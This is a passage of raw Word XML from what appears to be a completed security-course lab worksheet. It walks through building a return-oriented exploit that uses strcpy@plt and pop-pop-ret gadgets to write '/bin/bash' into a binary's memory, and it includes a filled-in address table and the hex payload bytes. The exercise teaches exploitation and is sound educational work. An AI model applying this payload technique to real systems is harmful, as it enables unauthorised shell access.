          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A327C8" w:rsidRDefault="00A327C8">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>0x0804a041</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="56F6AD2B">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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 xml:space="preserve">This corresponds to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>str_loc_1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in your build-string payload (and, indeed, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cmd_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">overall payload); add one to this address and you have the value for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>str_loc_2</w:t>
      </w:r>
      <w:r>
        <w:t>, and so on.</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rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>GATE 6</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Finally, we need to assemble the addresses of the characters that will be used to create our string. Recall, we need to find all of the characters in our chosen string, “/bin/bash”, at locations within our binary.</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The table below will record the addresses we find for each of the characters that we need.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00A32DAA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBd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115"/>
        <w:gridCol w:w="2505"/>
        <w:gridCol w:w="2430"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A32DAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2310"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pPr>
            <w:r>
              <w:t>Character</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="211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pPr>
            <w:r>
              <w:t>Hex representation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="250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pPr>
            <w:r>
              <w:t>Payload tag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430"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pPr>
            <w:r>
              <w:t>Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A32DAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2310"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
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="211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2f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="250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src_byte_addr_1,</w:t>
            </w:r>
          </w:p>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src_byte_addr_5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00A32DAA" w:rsidRDefault="00A327C8">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0x08048154</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A32DAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2310"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b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="211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62</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="250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src_byte_addr_2,</w:t>
            </w:r>
          </w:p>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src_byte_addr_6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00A32DAA" w:rsidRDefault="00A327C8">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0x08048157</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A32DAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2310"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i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="211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69</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="250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src_byte_addr_3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00A32DAA" w:rsidRDefault="00A327C8">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0x08048156</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A32DAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2310"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n</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="211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6e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="250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src_byte_addr_4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00A32DAA" w:rsidRDefault="00A327C8">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0x0804815e</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A32DAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2310"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="211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61</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="250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src_byte_addr_7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00A32DAA" w:rsidRDefault="00A327C8">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0x080482b5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A32DAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2310"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="211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73</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="250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src_byte_addr_8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00A32DAA" w:rsidRDefault="00A327C8">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0x080482b3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A32DAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2310"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h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="211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68</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="250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src_byte_addr_9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00A32DAA" w:rsidRDefault="00A327C8">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0x08048396</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A32DAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2310"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&lt;null terminator&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="211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00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2505" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00A32DAA" w:rsidRDefault="00AC696B">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src_byte_addr_10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00A32DAA" w:rsidRDefault="00A327C8">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0x080482cc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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 xml:space="preserve">Once again, we can use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>readelf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">utility to do this job. There are other ways, but this works just as well as any other. In the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>readelf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> output above, you can see that each section has a number. If we use those numbers in place of the variable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in the command below, we will obtain a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hexdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of that section, including addresses. (Remember, in this output format, the address you see on the left corresponds to the left-most byte on that line!)</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readelf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> -x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> ans_check5</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Use the command line above to iterate through the sections. When you find a section that looks like a promising source of characters, include the command line and output below. As you may have discovered already, it is easier to use a fixed font like Courier New for this output, and to reduce the font size, in order to preserve formatting and keep the output legible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF1FB9" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00CF1FB9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="4929229"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="7" name="Picture 7" descr="C:\Users\Po Adrich\Desktop\CSE523\18\QQ截图2019042116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o Adrich\Desktop\CSE523\18\QQ截图2019042116020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rsidR="00CF1FB9" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00CF1FB9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="4929229"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="8" name="Picture 8" descr="C:\Users\Po Adrich\Desktop\CSE523\18\QQ截图2019042116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o Adrich\Desktop\CSE523\18\QQ截图201904211602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rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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Use this output to fill in the addresses in table above.</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b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>GATE 7</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We are now ready to construct our payload using the addresses gathered above.</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 xml:space="preserve">We will begin with our build-string payload. Construct it in the space below, beneath the template. Recall that each word needs its bytes reversed, as has been the case in each of our previous payloads. For example, an address like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>0x0804a031</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> would be encoded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x31\xa0\x04\</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>x08</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Also note that the | characters are just visual aids, and should not be present in the payload. For clarity, it would be a good idea to keep this copy separated by lines, to make any errors easier to spot.</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 xml:space="preserve">NOTE: There are many places to screw up, so you’ll need to be very thorough and meticulous </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>when building your full payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00A32DAA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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str_loc_1 | src_byte_addr_1</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str_loc_2 | src_byte_addr_2</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str_loc_3 | src_byte_addr_3</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str_loc_4 | src_byte_addr_4</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str_loc_5 | src_byte_addr_5</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str_loc_6 | src_byte_addr_6</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str_loc_7 | src_byte_addr_7</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str_loc_8 | src_byte_addr_8</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str_loc_9 | src_byte_addr_9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA"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&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>strcpy@plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> | &amp;pop-pop-ret | str_loc_10 | src_byte_addr_10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00A32DAA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC696B" w:rsidRDefault="00AC696B" w:rsidP="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\xb0\x83\x04\x08\x2e\x86\x04\x08</w:t>
      </w:r>
      <w:r w:rsidRPr="00F171CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x41\xa0\04\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x54\x81\x04\x08</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC696B" w:rsidRDefault="00AC696B" w:rsidP="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\xb0\x83\x04\x08\x2e\x86\x04\x08</w:t>
      </w:r>
      <w:r w:rsidRPr="00F171CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x42\xa0\04\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x57\x81\x04\x08</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC696B" w:rsidRDefault="00AC696B" w:rsidP="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\xb0\x83\x04\x08\x2e\x86\x04\x08</w:t>
      </w:r>
      <w:r w:rsidRPr="00F171CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x43\xa0\04\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x56\x81\x04\x08</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC696B" w:rsidRDefault="00AC696B" w:rsidP="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\xb0\x83\x04\x08\x2e\x86\x04\x08</w:t>
      </w:r>
      <w:r w:rsidRPr="00F171CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x44\xa0\04\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x5e\x81\x04\x08</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC696B" w:rsidRDefault="00AC696B" w:rsidP="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\xb0\x83\x04\x08\x2e\x86\x04\x08</w:t>
      </w:r>
      <w:r w:rsidRPr="00F171CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x45\xa0\04\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x54\x81\x04\x08</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC696B" w:rsidRDefault="00AC696B" w:rsidP="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\xb0\x83\x04\x08\x2e\x86\x04\x08</w:t>
      </w:r>
      <w:r w:rsidRPr="00F171CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x46\xa0\04\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x57\x81\x04\x08</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC696B" w:rsidRDefault="00AC696B" w:rsidP="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\xb0\x83\x04\x08\x2e\x86\x04\x08</w:t>
      </w:r>
      <w:r w:rsidRPr="00F171CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x47\xa0\04\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\xb5\x82\x04\x08</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC696B" w:rsidRDefault="00AC696B" w:rsidP="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\xb0\x83\x04\x08\x2e\x86\x04\x08</w:t>
      </w:r>
      <w:r w:rsidRPr="00F171CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x48\xa0\04\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\xb3\x82\x04\x08</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC696B" w:rsidRDefault="00AC696B" w:rsidP="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\xb0\x83\x04\x08\x2e\x86\x04\x08</w:t>
      </w:r>
      <w:r w:rsidRPr="00F171CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x49\xa0\04\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x96\x83\x04\x08</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC696B" w:rsidRDefault="00AC696B" w:rsidP="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\xb0\x83\x04\x08\x2e\x86\x04\x08</w:t>
      </w:r>
      <w:r w:rsidRPr="00F171CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x4a\xa0\04\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>xcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>\x82\x04\x08</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00A32DAA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00A32DAA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
